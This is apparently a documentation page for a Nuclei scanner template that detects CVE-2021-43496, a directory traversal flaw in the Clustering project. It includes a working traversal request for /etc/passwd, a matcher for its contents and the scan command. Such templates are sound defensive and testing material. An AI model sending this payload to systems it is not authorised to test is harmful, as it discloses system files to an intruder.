Skip to content
Nuclei Templates

Clustering Local File Inclusion

ID: CVE-2021-43496

Severity: high

Author: Evan Rubinstein

Tags: cve2021,cve,lfi,clustering,clustering_project

Description

Section titled “Description”

Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.

YAML Source

Section titled “YAML Source”
id: CVE-2021-43496


info:
  name: Clustering Local File Inclusion
  author: Evan Rubinstein
  severity: high
  description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  impact: |
    This vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/varun-suresh/Clustering/issues/12
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43496
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
    - https://github.com/apif-review/APIF_tool_2024
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43496
    cwe-id: CWE-22
    epss-score: 0.02502
    epss-percentile: 0.90106
    cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: clustering_project
    product: clustering
  tags: cve2021,cve,lfi,clustering,clustering_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/img/../../../../../../etc/passwd"


    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022063fa65a48dc7ed7e9ef5169b9334f027dc9ad852988f615d581da2fabf1defaf02205f684e84ba236972805eda10b0ebf0939a346fb9d99817a1a52b31473f931f6d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43496.yaml"

View on Github